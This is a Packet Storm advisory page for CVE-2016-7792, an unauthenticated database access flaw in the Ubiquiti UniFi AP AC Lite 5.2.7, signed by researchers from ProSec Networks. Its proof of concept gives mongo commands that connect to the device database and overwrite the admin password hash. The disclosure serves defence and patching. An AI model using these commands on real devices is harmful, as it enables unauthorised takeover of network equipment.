exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Ubiquiti UniFi AP AC Lite 5.2.7 Improper Access Control

Ubiquiti UniFi AP AC Lite 5.2.7 Improper Access Control
Posted Sep 30, 2016
Authored by Tim Schughart, Khanh Quoc Pham, Immanuel Bar

Ubiquiti UniFi AP AC Lite version 5.2.7 allows for direct modification of the database with no authentication.

tags | exploit
advisories | CVE-2016-7792
SHA-256 | f40eba146d3abfc3da878bf10eac9a021530c62f26eb11f3fb7cd42dd34d3ee2

Ubiquiti UniFi AP AC Lite 5.2.7 Improper Access Control

Change Mirror Download
Product: UniFi AP AC Lite
Vendor: Ubiquiti Networks Inc.

Internal reference: ? (Bug ID)
Vulnerability type: Incorrect access control
Vulnerable version: Unify 5.2.7 and possible other versions affected (not tested)
Vulnerable component: Database
Report confidence: yes
Solution status: Not fixed by Vendor, the bug is a feature.
Fixed versions: -
Researcher credits: Tim Schughart, Immanuel BA$?r, Khanh Quoc Pham of ProSec Networks
Solution date: -
Public disclosure: 2016-09-30
CVE reference: CVE-2016-7792
CVSSv3: 8.8 AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H


Vulnerability Details:
You are able to connect to the access points database, because of an broken authentication (OWASP TOP10). So you are able to modify the database and read the data. An possible scenario you'll find in PoC section.

Risk:
An attacker gets access to the database and for e.g. is able to change the admins password, like you see in PoC below.

PoC:
1. Generate SHA512 Hash with e.g.
mkpasswd -m sha-512

2. Connect via network to database, e.g. :
mongo --port 27117 --host target_ip

3. Change password via command
"db.admin.update({"name":"ProSec"}, {$set : {"x_shadow":
"$6$Se9i5I7k3hI8d4bk$CqEXRUwk7c7A/62E/HcC4SrMSLOrBdm7wRvwTS4t.nNJA3RYta0RfzJpuREg.qcAHsPGW9Gjwm3krJROXzbCv."}})"
4. Login via web interface with new password


Best regards / Mit freundlichen GrA1/4Aen


Tim Schughart
CEO / GeschA$?ftsfA1/4hrer

--
ProSec Networks e.K.
Ellingshohl 82
56077 Koblenz

Website: https://www.prosec-networks.com
E-Mail: t.schughart@prosec.networks.com
Mobile: +49 (0)157 7901 5826
Phone: +49 (0)261 450 930 90

"This E-Mail communication may contain CONFIDENTIAL, PRIVILEGED and/or LEGALLY PROTECTED information and is intended only for the named recipient(s). Any unauthorized use, dissemination, copying or forwarding is strictly prohibited. If you are not the intended recipient and have received this email communication in error, please notify the sender immediately, delete it and destroy all copies of this E-Mail. VAT ID: DE290654714 legal domicile Koblenz, HRA 21625.a

"Diese E-Mail Mitteilung kann VERTRAULICHE, dem BERUFSGEHEIMNIS UNTERLIEGENDE und/oder RECHTLICH GESCHATZTE Informationen enthalten und ist ausschlieAlich fA1/4r den/die genannten Adressaten bestimmt. Jede unbefugte Nutzung, Weitergabe, VervielfA$?ltigung oder Versendung ist strengstens verboten. Sollten Sie nicht der angegebene Adressat sein und diese E-Mail Mitteilung irrtA1/4mlich erhalten haben, informieren Sie bitte sofort den Absender, lAPschen diese E-Mail und vernichten alle Kopien. USt-IdNr.: DE290654714, Amtsgericht Koblenz, HRA 21625."

Login or Register to add favorites

File Archive:

May 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    15 Files
  • 2
    May 2nd
    16 Files
  • 3
    May 3rd
    38 Files
  • 4
    May 4th
    15 Files
  • 5
    May 5th
    35 Files
  • 6
    May 6th
    0 Files
  • 7
    May 7th
    0 Files
  • 8
    May 8th
    8 Files
  • 9
    May 9th
    66 Files
  • 10
    May 10th
    19 Files
  • 11
    May 11th
    27 Files
  • 12
    May 12th
    8 Files
  • 13
    May 13th
    0 Files
  • 14
    May 14th
    1 Files
  • 15
    May 15th
    19 Files
  • 16
    May 16th
    66 Files
  • 17
    May 17th
    28 Files
  • 18
    May 18th
    32 Files
  • 19
    May 19th
    13 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close